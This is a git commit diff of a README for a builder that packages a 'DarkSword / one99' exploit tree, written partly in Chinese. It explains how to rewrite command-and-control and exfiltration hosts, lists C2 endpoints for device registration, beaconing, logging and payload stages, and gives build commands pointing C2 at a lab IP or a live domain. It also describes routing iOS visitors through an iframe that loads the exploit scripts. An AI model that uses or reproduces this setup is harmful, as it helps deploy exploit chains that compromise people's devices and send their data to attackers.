This commit is contained in:
hashbro
2026-08-26 06:10:33 +08:00
parent 5cb5744b7a
commit 0ce51aa33e
41 changed files with 1146 additions and 1154 deletions
+7 -23
View File
@@ -1,31 +1,15 @@
# channel-builder-ds
DarkSword / one99 static builder. `source/` is the pristine tree (live hosts).
`tools/build.py` rewrites C2 / delivery origins and copies the result to
`public/next-chain`. Runtime splits two bases:
`source/` 是 one99/raw 的利用树。构建只做 C2 主机字符串替换,再拷到 `public/next-chain`。
- `__LAB_DELIVERY_HOST__` — static assets; may include a path (`https://cdn.example.com/next-chain`)
- `__LAB_EXFIL__` — C2 / API (`/api/ds/chain-targets`, `/api/ds/device/register`, `/api/ds/log`, beacon/war)
**资源域名不配置:** 页面用当前 weifile 的 `location.origin + /next-chain`。
**C2 可配置:** `php artisan ds:build --c2 …` 改 `/api/ds/log` `/api/ds/chain-targets` `/api/ds/device/register` `/beacon` `/war` `/stats`。
If the page is served under `/next-chain/`, delivery host is inferred automatically.
Override in `source/config.js`:
```js
deliveryHost: "https://cdn.example.com/next-chain", // full base, or
deliveryPath: "/next-chain", // location.origin + path
exfil: { host: "api.example.com", http_port: 443, https_port: 443, tls: true },
```
weifile(本身已是 iframe)按 iOS 路由后直接 `loadScript` `config.js` + `boot.js`,不再套一层 iframe。渠道 ID 与 weifile 相同:`/channel/X.Y.ZZ/`。
```bash
# 本地实验室
php artisan ds:build --origin http://192.168.31.130:8000
# 线上 C2(必须带 --origin,否则会沿用 source/config.js 里的 192.168.31.130)
php artisan ds:build --origin https://你的域名
# 等价
cd channel-builder-ds
python3 tools/build.py --origin https://你的域名
php artisan ds:build --c2 http://192.168.31.130:8000
php artisan xxbb:repack
```
看产物用 `public/next-chain/config.js`,不要看 `source/config.js`(模板,构建不会改它)。
PE 进度:`GET /api/ds/pe-stage/{name}.js` 打到 C2(记日志并吐 JS)。`public/next-chain/pe_stage/` 仍随 `ds:build` 发布,但客户端不再走这条静态路径。